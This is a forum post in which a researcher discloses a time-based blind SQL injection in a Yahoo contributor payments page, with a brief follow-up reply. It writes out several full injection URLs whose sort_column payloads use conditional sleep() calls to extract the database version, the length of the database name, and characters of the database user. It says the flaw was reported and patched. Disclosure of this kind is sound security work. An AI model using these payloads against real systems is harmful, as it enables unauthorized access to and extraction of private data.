b3hr0uz Posted October 9, 2014 Report Posted October 9, 2014 First of all let’s figure out the database version:contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+substring((select+version()),1,1)=4+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69Which is false (version 4) and will sleep for 20 seconds. Let’s try Version 5:contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN substring((select version()),1,1)=5 THEN(sleep(1)) ELSE (sleep(20))END As BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69Which after a quick second we got returned to our data-table page. Now as far as the database name goes, I will demonstrate only a few things due to the fact that the user length was 24 letters and database name was 6 letters: username: ****wwcontributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+(select+LENGTH(DATABASE()))=6+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69and for the username: ***********@**.***.*.*** (taken out for security purposes) but as can see the 15th letter is show to be a “.” in the url below:http://contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN ASCII(substring((select user()),15,1))=46 THEN(sleep(1)) ELSE (sleep(60))END As BS)v)&sort_dir=asc&start_date=&override_id=131114After 36 days I finally heard back from Yahoo that it has been patched! Thank you for reading! In a few weeks I will be soon covering a XSPA and XSS in a few services.Behrouz Sadeghipour@NahamSecNahamSec.com | Behrouz Sadeghipour's Personal Website 1 Quote
askwrite Posted March 12, 2015 Report Posted March 12, 2015 resolved..resolved ce? After 36 days I finally heard back from Yahoo that it has been patched! Thank you for reading! In a few weeks I will be soon covering a XSPA and XSS in a few services.si e si din 2014... Quote
